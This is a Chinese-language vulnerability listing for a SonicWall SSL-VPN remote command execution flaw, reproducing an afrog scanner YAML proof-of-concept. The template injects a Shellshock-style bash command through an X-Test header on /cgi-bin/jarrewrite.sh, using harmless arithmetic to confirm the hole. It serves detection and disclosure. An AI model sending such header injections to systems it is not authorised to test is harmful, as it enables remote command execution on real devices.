sonicwall-ssl-vpn-rce: SonicWall SSL-VPN 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: SonicWall SSL-VPN | POC: 已公开

漏洞描述

SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞 app="SONICWALL-SSL-VPN"

PoC代码[已公开]

id: sonicwall-ssl-vpn-rce

info:
    name: SonicWall SSL-VPN 远程命令执行漏洞
    author: sharecast
    severity: high
    description: |
        SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞
        app="SONICWALL-SSL-VPN"
    reference:
        - http://wiki.peiqi.tech/wiki/iot/SonicWall/SonicWall%20SSL-VPN%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

set:
    r1: randomInt(40000, 44800)
    r2: randomInt(1140000, 1144800)
rules:
    r0:
        request:
            method: GET
            path: /cgi-bin/jarrewrite.sh
            headers:
                X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/sonicwall-ssl-vpn-rce.yaml

相关漏洞推荐